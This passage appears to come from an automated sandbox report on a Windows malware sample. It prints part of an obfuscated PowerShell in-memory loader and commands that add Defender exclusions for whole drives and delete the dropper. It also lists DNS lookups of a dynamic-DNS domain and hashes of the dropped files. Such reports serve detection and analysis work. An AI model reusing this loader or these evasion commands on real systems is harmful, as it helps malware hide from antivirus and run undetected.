System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ 
([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2324);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network42453Man')

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 29.81.57.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp
US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp
US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp
US | 8.8.8.8:53 | moonli.ddnsking.com | udp

Files

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnoef2aw.j2l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 353251515e65be2ff4989493f9d935d5
SHA1 e631e54e9dd81dd8bb319cb8b993c98203e91597
SHA256 7e2ba5c81969ab85a57900abffdcd19e8d71d06ff555440894da71eb83fe968e
SHA512 1e034f44255e011d830ad159ee69a900d755f33730963e90214e94a39af122516c56c6af477adcbc4f1f2ee567eafe88451303bd7fb853db65ff51904aafc987

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a0e04953ede77bd514ab2b4fb98ed462
SHA1 5e54f266da2333315f6d26bac6146cb926f8b5ab
SHA256 d7b3698e20d2614a9f126c7c4481964202af3f2134668edbd094480118ddf058
SHA512 cdd527ab23efdc410db1eabbeb9f8c106b5e6cee4f2af74f0a8502ccb0ea9bdd1e63d6bd15f1c321a84be6bc55300d1380b1b8e2a0c9d805d1dc37e5e6d3825a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c2a7cb16ad143e4f9f319c8416955a44
SHA1 ac4be445b8bfe2bd1773f53110aa59c066013237
SHA256 68d3b721b0f3a434db356eb0c16f17903bb461fd814c4242f7d7c55d2065a070
SHA512 11f9fc68c783f9a3760c70179bfc52c25b0c3b7afd90868f1faf3ea3dd4d27864394edd30db351f58d6df10bbb63b8616430fca71a21b5ab2aeeb403c53e24c6

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd

MD5 12d05ccce56b71317838c1f70c434fdd
SHA1 db2b6548661dc0ad3c19439989e1c36bf62a9ca7
SHA256 c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e
SHA512 79c4c072efba2838d053dd3912484e4138371eac29bd556e344c62abc1b49313bf562fcc6c613c7756c6d24ecc4203336da5aacaf9d4602eb8c5d6caa45053b2

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 44f0c2fadcb59edf6d0e65a9030c446a
SHA1 b10b258678afe1d545da4309f0127061935369bc
SHA256 7d7411d9f6729c5bc44dfe9bd47675c4a205e1c5d1f84d464d10f50a4f2fd10f
SHA512 766f8a51ef0f640159ec139f53b264881813f95a1b1b83aae159cfb317b4f4d15ff7833206f55ec61e3426e7e5a41d5f9f914bdd89c20765c5e0c3eb36e29d27

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3313e1b2690f1a9860ec7268b0d6e056
SHA1 751eda9b6e37337062055274495a5a9f6c99e6fb
SHA256 b22f6749c76593a599d5fddeb01fcc387be5d4df8fc8261ae316c61c331e2ec4
SHA512 b45c3aab6b41d53bfefb16abc10af660b0315055e8e65f7d3ffaebd479d9371a65502a14acfa3c91730fefaf30cc7914a5fad01a60d68536994d92d8806e50a1
